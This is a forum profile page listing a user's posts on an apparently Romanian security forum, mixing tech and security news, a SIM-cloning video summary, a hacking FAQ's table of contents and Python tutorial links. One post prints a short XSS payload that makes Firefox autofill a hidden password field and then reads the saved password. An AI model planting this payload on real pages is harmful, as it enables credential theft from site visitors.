Jump to content

begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. gez?s, ai auzit de cookie ? //ti-am citit postul de 3 ori sa fiu sigur daca am inteles
  2. PayPal's chief of legal affairs has apologised to Cryptome after the eBay-owned payment service confiscated its funds without explanation. John Muller, ultimately responsible for setting PayPal's guidelines, says the payment company made a mistake. He adds that he was a fan and former donor to Cryptome. Operator John Young says it's not enough. Insult was added to injury when a PR contacted The Register last week, falsely claiming the account had been restored, but more importantly alleging unspecified illegal activity. Writes Young: PayPal's actions have caused damage to my reputation and Cryptome's, loss of funds and impugnment of the intentions of hundreds of supporting donors. A meaningful PayPal response for its unsubstantiated attack on me, my web site and donors would address these serious damages and provide an amelioration commensurate with their gravity. More at Cryptome, here. ® source : theregister.co.uk
  3. Combining security, performance and energy efficiency, Intel launched the Intel Xeon Processor 5600 series which deliver two new security features -- Intel Advanced Encryption Standard New Instructions (Intel AES-NI), and Intel Trusted Execution Technology (Intel TXT) -- that enable faster encryption and decryption performance for more secure transactions and virtualized environments, providing data centers with a stronger foundation for cloud security. These are also the first server and workstation chips based on the new Intel 32nm logic technology, which uses Intel's second-generation high-k metal gate transistors to increase speed and decrease energy consumption. The Intel Xeon Processor 5600 series supports up to six cores per processor and delivers up to 60 percent greater performance than the 45nm Intel Xeon processor 5500 series. In addition, data centers can replace 15 single-core servers with a single new one, and achieve a return on their investment in as little as 5 months. With emerging threats, new architectures and an ever-changing regulatory environment, security is an increasing concern for IT managers, and often an impediment to deploying more advanced computing infrastructures. The Intel Xeon processor 5600 series addresses these issues with features that help ensure greater data integrity. The Intel Xeon processor 5600 series includes Intel AES-NI, a new set of instructions first introduced with the new 2010 Intel Core processor family. These instructions accelerate AES performance to enable faster data encryption and decryption for a wide range of applications such as database encryption features, full disk encryption and secure internet transactions. Intel TXT will provide added security that cloud environments have been waiting for by enabling a more secure platform launch environment, along with providing more protection for applications that move between virtualized servers. Hardware-based capabilities integrated into the processor shield against malicious software to allow important applications and data to run more securely in a virtualized environment. Working together, Intel TXT and Intel AES can ensure that virtualized environments experience better performance and functionality, and are more secure when they are launched, migrated or at rest. Intel launches its most secure data center processor
  4. In this video, Limor and Philip from Citizen Engineer, demonstrate how to clone SIM cards and hack payphones to do interesting things. The SIM card section starts with a primer on how the authentication works in the GSM world - challenge / response where the SIM contains the encryption key which is used to encrypt the challenge sent by the base station. Now the problem seems to be that there is no way to retrieve the encryption key directly from the SIM cards and the only way (which also only works for older cards) is to use a chosen plain text attack. This attack is carried out by connecting the SIM to a computer and bombarding it with encryption requests for known plain texts. After enough samples go through, the encryption key can be cracked. Once the encryption key is known it is trivial to clone the card using a writer. The video demonstrates the whole hardware hack on how to build your own reader, however, if you do not have the patience or the necessary skills / equipment then you can purchase one from them directly. In the later part of the video, Limor demonstrates how to modify Western Electric payphones so that they can be used as a home telephone, for VoIP (Skype) and to make it accept quarters. The whole video is more of a "hardware hacking" session than much of software. Its very well made and is definitely a recommended watch. Cloning SIM Cards and Hacking Payphones Tutorial
  5. versiunea free merge doar pe firefox si ie. asta e free(1 an) si merge pe toate aplicatiile. oricum l-am instalat si l-am testat pe mai multe tipuri de keyloggere (care functioneaza prin mai multe metode) si pe toate le-a blocat, so :]
  6. Un keylogger este un program care inregistreaza tot ceea ce se tasteaza de la o tastatura si de asemenea miscarile si click-urile mouse-ului. Sunt utilizari recomandate in cazul urmaririi unor erori in calculator, urmaririi activitatii angajatilor unei firme insa sunt la fel de des folositi de catre creatorii de virusi. In acest caz ei inregistreaza parolele, cod-urile cardurilor si alte informatii importante tastate de la un PC si apoi sunt trimise atacatorului a carui munca este doar de a le folosi pentru spargerea conturilor bancare, casutelor de e-mail, etc. Desi programele antivirus, cele de tip hips, behavior blocker detecteaza asa ceva, exista si un program specializat doar pe asemenea programe. Se numeste Zemana Antilogger si are chiar si unele functii mai avansate: monitorizarea copierii clipboard-ului, a webcam-ului, interceptarea copierii unor screenshot-uri de pe ecran sau a logarilor SSL, plus toate cele descrise in primele mele fraze. Programul costa in mod obisnuit 34$, dar se ofera gratuit timp de un an accesand acest link. Accesati site-ul si descarcati programul, in versiunea 1.9.2. Nu necesita serial sau alte activari ulterioare. Aceasta este o promotie in colaborare cu SoftPedia. sursa : faravirusi.com
  7. n-are de unde sa stie, doar daca ie news-geek ca mine :] peste 2-3 zile presupun ca apare si la noi in tara la stiri.
  8. This FAQ is intended to explain and show the theory and practice behind hacking. While it serves both administrator and hacker alike, the perspective is from the intruder. Table of Contents 1.0 Administrivia * What is the mission and goal of this FAQ? * How was this FAQ prepared? * How do I add to this FAQ? * Contributors * Other Credits * Where can I download this FAQ? * Where is the disclaimer? * Changelog 2.0 Attack Basics * What are the four steps to hacking? 3.0 Account Basics * What are accounts? * What are groups? 4.0 Password Basics * What are some password basics? * Why protect the hashes? * What is a dictionary password cracker? * What is a brute force password cracker? * Which method is best for cracking? * What is a salt? * What are the dangers of cracking passwords? * Where are the password hashes stored? * Are there any password schemes that are safe? * Is there any way I can open a password-protected Microsoft Office document? 5.0 Denial of Service Basics * What is Denial of Service? * What are some DoS scenarios? * What is the Ping of Death? * What is a SYN Flood attack? * What are other popular DoS attacks? * What are distributed DoS attacks? * How can I discover new DoS attacks? * How does one defend against DoS attacks? 6.0 Logging Basics * Why do I care about auditing, accounting, and logging? * What are some different logging techniques used by Admins? * Why should I not just delete the log files? 7.0 Miscellaneous Basics * What is a backdoor? * What is a buffer overflow? * What is "lame"? * How do I get around censorware like Net Nanny or the Great Firewall of China? * How can I forge email addresses? * What's with ICQ? 8.0 Web Browser * What is unsafe about my browser? * What is in the history, bookmark, and cache files? * What other browser files are important? * Can you tell me more about the cookie file? * How can I protect my browser files? * So why all of the paranioa about browsers? 9.0 The Web Browser as an Attack Tool * What is phf? * What's the "test" hack? * What about that "~" character? * What is the jj.c problem? * What's the deal with forms? * What will this look like in the target's log files? * What's the deal with Server-Side Includes? * What if SSIs are turned on but includes are stripped from user input? * What are SSL? * How can I attack anonymously? * What is the asp dot attack? * What is the campas attack? * What is the count.cgi attack? * What is the faxsurvey attack? * What about finger.cgi? * What is the glimpse exploit? * What are some other CGI scripts that allow remote command execution? * What are the MetaInfo attacks? 10.0 The Basic Web Server * What are the big weak spots on servers? * What are the critical files? * What's the difference between httpd running as a daemon vs. running under inetd? * How does the server resolve paths? * What log files are used by the server? * How do access restrictions work? * How do password restrictions work? * What is web spoofing? 11.0 NT Basics * What are the components of NT security? * How does the authentication of a user actually work? * What is "standalone" vs. "workgroup" vs. "domain"? * What is a Service Pack? * What is a Hot Fix? * Where are Service Packs and Hot Fixes? * What's with "C2 certification"? * Are there are interesting default groups to be aware of? * What are the default directory permissions? * Are there any special restrictions surrounding the Administrative Tools group in Presentation Manager? * What is the Registry? * What are hives? * Why is the Registry like this and why do I care? * What is the deal with Microsoft's implementation of PPTP? 12.0 NT Accounts * What are common accounts and passwords in NT? * What if the Sys Admin has renamed the Administrator account? * How can I figure out valid account names for NT? * What can null sessions to an NT machine tell me? 13.0 NT Passwords * How do I access the password file in NT? * What do I do with a copy of SAM? * What's the full story with NT passwords? * How does brute force password cracking work with NT? * How does dictionary password cracking work with NT? * I lost the NT Administrator password. What do I do? * How does a Sys Admin enforce better passwords? * Can an Sys Admin prevent/stop SAM extraction? * How is password changing related to "last login time"? 14.0 NT Console Attacks * What does direct console access for NT get me? * What about NT's file system? * What is Netmon and why do I care? 15.0 NT Client Attacks * What is GetAdmin.exe and Crash4.exe? * Should I even try for local administrator access? * I have guest remote access. How can I get administrator access? * What about %systemroot%\system32 being writeable? * What if the permissions are restricted on the server? * What exactly does the NetBios Auditing Tool do? * What is the "Red Button" bug? * What about forging DNS packets for subversive purposes? * What about shares? * How do I get around a packet filter-based firewall? * I hack from my Linux box. How can I do all that GUI stuff on remote NT servers? * What's the story with WinGate? * How do I find these buggy WinGates I can use? 16.0 NT Denial of Service * What can telnet give me in the way of denial of service? * What can I do with Samba? * What's with ROLLBACK.EXE? * What is an OOB attack? * Are there any other Denial of Service attacks? 17.0 NT Logging and Backdoors * Where are the common log files in NT? * How do I edit/change NT log files without being detected? * So how can I view/clear/edit the Security Log? * How can I turn off auditing in NT? 18.0 NT Misc. Attack Info * How is file and directory security enforced? * What is NTFS? * Are there are vulnerabilities to NTFS and access controls? * What is Samba and why is it important? * How do I bypass the screen saver? * How can I detect that a machine is in fact NT on the network? * Can I do on-the-fly disk encryption on NT? * Does the FTP service allow passive connections? * What is this "port scanning" you are talking about? * Does NT have bugs like Unix' sendmail? * How is password changing related to "last login time"? * Can sessions be hijacked? * Are "man in the middle" attacks possible? * What about TCP Sequence Number Prediction? * What's the story with buffer overflows on NT? 19.0 Netware Accounts * What are common accounts and passwords for Netware? * How can I figure out valid account names on Netware? 20.0 Netware Passwords * How do I access the password file in Netware? * What's the full story with Netware passwords? * How does password cracking work with Netware? * How does password cracking work with Netware? * Can an Sys Admin prevent/stop Netware password hash extraction? * Can I reset an NDS password with just limited rights? * What is OS2NT.NLM? * How does password encryption work? * Can I login without a password? * What's with Windows 95 and Netware passwords? 21.0 Netware Console Attacks * What's the "secret" way to get Supe access Novell once taught CNE's? * How do I use SETPWD.NLM? * I don't have SETPWD.NLM or a disk editor. How can I get Supe access? * What's the "debug" way to disable passwords? * How do I defeat console logging? * Can I set the RCONSOLE password to work for just Supervisor? * How can I get around a locked MONITOR? * Where are the Login Scripts stored in Netware 4.x and can I edit them? * What if I can't see SYS:_NETWARE? * So how do I access SYS:_NETWARE? * How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF? * What else can be done with console access? 22.0 Netware Client Attacks * What is the cheesy way to get Supervisor access? * How can I login without running the System Login Script in Netware 3.x? * How can I get IP info from a Netware server remotely? * Does 4.x store the LOGIN password to a temporary file? * Everyone can make themselves equivalent to anyone including Admin. How? * Can Windows 95 bypass NetWare user security? * What is Packet Signature and how do I get around it? 23.0 Netware Denial of Service * How can I abend a Netware server? * Will Windows 95 cause server problems for Netware? * Will Windows 95 cause network problems for Netware? 24.0 Netware Logging and Backdoors * How do I leave a backdoor for Netware? * What is the rumored "backdoor" in NDS? * What is the bindery backdoor in Netware 4.x? * Where are the common log files in Netware? * What is Accounting? * How do I defeat Accounting? * What is Intruder Detection? * How do I check for Intruder Detection? * What are station/time restrictions? * How can I tell if something is being Audited in Netware 4.x? * How can I remove Auditing if I lost the Audit password? * What is interesting about Netware 4.x's licensing? * What is the Word Perfect 5.1 trick when running Netware 3.x over DOS? 25.0 Netware Misc. Attack Info * How do I spoof my node or IP address? * How can I see hidden files and directories? * How do I defeat the execute-only flag? * How can I hide my presence after altering files? * What is a Netware-aware trojan? * What are Trustee Directory Assignments? * Are there any default Trustee Assignments that can be exploited? * What are some general ways to exploit Trustee Rights? * Can access to .NCF files help me? * Can someone think they've logged out and I walk up and take over? * What other Novell and third party programs have holes that give "too much access"? * How can I get around disk space requirements? * How do I remotely reboot a Netware 3.x file server? * What is Netware NFS and is it secure? * Can sniffing packets help me break into Netware servers? * What else can sniffing around Netware get me? * Do any Netware utilities have holes like Unix utilities? * Where can I get the Netware APIs? * Are there alternatives to Netware's APIs? * How can I remove NDS? * What are security considerations regarding partitions of the tree? * Can a department "Supe" become a regular Admin to the entire tree? * Are there products to help improve Netware's security? * Is Netware's Web server secure? * What's the story with Netware's FTP NLM? * Can an IntranetWare server be compromised from the Internet? * Are there any problems with Novell's Groupwise? * Are there any problems with Netware's Macintosh namespace? * What's the story with buffer overflows on Netware? 26.0 Netware Mathematical/Theoretical Info * How does the whole password/login/encryption thing work? * Are "man in the middle" attacks possible? * Are Netware-aware viruses possible? * Can a trojaned LOGIN.EXE be inserted during the login process? * Is anything "vulnerable" during a password change? * Is "data diddling" possible? 27.0 Unix Accounts * What are common accounts and passwords for Unix? * How can I figure out valid account names for Unix? 28.0 Unix Passwords * How do I access the password file in Unix? * What's the full story with Unix passwords? * How does brute force password cracking work with Unix? * How does dictionary password cracking work with Unix? * How does a Sys Admin enforce better passwords and password management? * So how do I get to those shadowed passwords? * So what can I learn with a password file from a heavily secured system? * What's the story with SRP? 29.0 Unix Local Attacks * Why attack locally? * How do most exploits work? * So how does a buffer overflow work? 30.0 Unix Remote Attacks * What are remote hacks? 31.0 Unix Logging * Where are the common log files in Unix? * How do I edit/change the log files for Unix? 32.0 Hacker Resources * What are some security-related WWW locations? * What are some security-related USENET groups? * What are some security-related mailing lists? * What are some other FAQs? The Hack FAQ: Table of Contents
  9. Wikileaks presents a “threat to the U.S. Army” and publishes “potentially actionable information” for targeting military personnel, according to a classified intelligence report posted Monday on the whistleblowing site. The 32-page report entitled Wikileaks.org – An Online Reference to Foreign Intelligence Services, Insurgents, or Terrorist Groups? (.pdf) indicates the government’s concern that “current employees or moles” within the Defense Department or the U.S. government “are providing sensitive or classified information to Wikileaks.” To stop this, the 2008 report had suggested a campaign to expose and punish those who leak to the site, which was founded in 2007 by Chinese dissidents, journalists and mathematicians. “Wikileaks.org uses trust as a center of gravity by assuring insiders, leakers, and whistleblowers who pass information to Wikileaks.org personnel or who post information to the website that they will remain anonymous,” according to the report. “The identification, exposure, or termination of employment of or legal actions against current or former insiders, leakers, or whistleblowers could damage or destroy this center of gravity and deter others from using Wikileaks.org to make such information public.” The document is classified Secret, and was produced by the Army Counterintelligence Center, under the Department of Defense Intelligence Analysis Program. It appears to underscore the military’s alarm that Wikileaks might be used to reveal United States military secrets, or broadcast disinformation harmful to the U.S. Neither Wikileaks editor Julian Assange nor the Defense Department immediately responded for comment. The report, which could not be independently verified, said Wikileaks “could be of value to foreign intelligence and security services (FISS), foreign military forces, foreign insurgents, and foreign terrorist groups for collecting information or for planning attacks against U.S. forces, both within the United State and abroad.” The report added that the site “could be used to post fabricated information; to post misinformation, disinformation, and propaganda; or to conduct perception management and influence operations designed to convey a negative message to those who view or retrieve information from the website.” Run by Sunshine Press, Wikileaks has received awards from Amnesty International and has been praised by media groups and others for giving whistleblowers and political dissidents a forum to expose corruption and foster transparency. Notable leaks include the 238-page U.S. military manual detailing operations of the Defense Department’s Guantánamo Bay detention facility, and a Central Intelligence Agency manual for operating the CIA’s rendition flights, which involved undocumented detainees who were kidnapped in various locations and flown to countries outside the United States for interrogation and torture. Read More Secret Document Calls Wikileaks ‘Threat’ to U.S. Army | Threat Level | Wired.com
  10. Similar technique may work for Internet Explorer, Safari, Chrome, Opera, etc. Your mileage may vary. 1. Save a username / password in Firefox's password manager by filling out the form below with fake data. 2. Clicking "Remember" when asked. 3. Then click back. THE XSS EXPLOIT PAYLOAD <script> document.write('<form><input id=p type=password style=visibility:hidden></form>'); setTimeout('alert("Password: " + document.getElementById("p").value)', 100); </script> look here : XSS demo for stealing passwords from the Firefox Password Manager
  11. Absenta unei singure gene, p21, la mamifere, provoaca regenerarea membrelor pierdute. S-au facut teste pe soareci si au avut succes. mai multe aici : 1 gene lost = 1 limb regained? Scientists demonstrate mammalian regeneration through single gene deletion
  12. da, viata de caine. as face-o daca n-as avea motiv pentru care sa traiesc. m-as inrola fara sa stau pe ganduri. dar nu o fac.
  13. bluebox (wiki) Blue box - Wikipedia, the free encyclopedia
  14. Green Day - 21 Guns
  15. begood

    Idee Raid

    si ce "lasam" in urma ? ce dovada ca am reusit sa-i punem pe drumuri ? cum ramanem in "istorie" ?
  16. O companie elve?ian? produc?toare de parafarmaceurice a dat curs noilor cerin?e de pe pia?? ?i a produs primele prezervative pentru copii în vârst? de 12 ani. Conform datelor publicate de ziarul "El Periodico" un studiu efectuat de Universitatea din Basel (Elve?ia), pe un grup de aproximativ 1.480 de persoane, (copii cu vârsta de la 10-14 ani) a relevat necesitatea acestei forme de protec?ie, pentru c? 90% din subiectii intervieva?i au declarat c? au f?cut sex neprotejat. Compania produc?toare Lamprecht, care este lider pe pia?a produselor parafarmaceutice a produs prezervative cu dimensiuni mai mici, pe care le-a scos la vânzare la cel mai mic pre? din categoria acestor produse. Lansarea produsului ‘Hotshot’ pentru tineri ?i copii a fost un succes. Prezervativele au o dimensiune standard cu o unitate mai mic? decât cele pentru adul?i ?i o lungime de 19 centimetri. Cutia cu ?ase prezervative Hotshot cost? 5 euro. Compania produc?toare, Lamprecht A.G., a anun?at c? urm?toarea ?ar? care dore?te s? ofere produsul‘’Hotshot’’pe pia?a intern? este Marea Britanie, din cauza num?rului mare de rela?ii sexuale neprotejate în rândul adolescen?ilor. adevarul.es
  17. Ce zice xact se aproprie de realitate si e plauzibil.
  18. E exagerat mesajul "super programatori" etc ... si ai repetat cuvantul "hackuit" de ma doare urechea doar citind... Tu iti imaginezi ca noi suntem in diferite parti ale tarii, cum am lucra la o astfel de firma ? from home?
  19. foloseste CTRL+"+" sau minus.
  20. DLD, in ce oras voiam sa stiu, era clar ca e in romania, intrebam ironic.
  21. din safe mode nu merge sa stergi ? windows live cd faci unu cu programul asta, apoi poti intra de pe livecd si poti sterge toate fisierele manual. poti folosi si Ultimate Boot CD - Overview ca mediu live. slax cred ca nu poate interactiona cu ntfs (nu poate sterge dar poate citi) backtrack ? (raspundeti voi aici, nu stiu daca are suport write ntfs)
  22. mie imi merge perfect xp sp3.
  23. suntem in tara o_O unde sa venim mai exact ?
  24. Episode 1: Using the Python Interpreter Episode 2: Using Python as a Calculator Episode 3: Introduction to Strings Episode 4: Introduction to Lists Episode 5: First Steps Toward Programming Episode 6: Flow Control, if and for Statements Episode 7: The Range Function Episode 8.5: Defining Functions Episode 8: break and continue Statements, and else Clauses on Loops Episode 9: More on Defining Functions: Default Argument Values Episode 10: More on Defining Functions, Keyword Arguments .... .... .... Episode 41: A Brief Tour of the Standard Library Episode 42: More on the Standard Library Episode 43: Standard Library: Output Formatting Episode 44: Standard Library: Templating Episode 45: Standard Library: Working with Binary Data Episode 46: Multi-threading Episode 47: Standard Library: Logging Episode 48: Standard Library: Weak References Episode 49: Standard Library: Tools for Working with Lists Episode 50: Standard Library: Decimal Floating Point Arithmetic http://python.secsup.org/ Cu dedicatie pentru cmiN
×
×
  • Create New...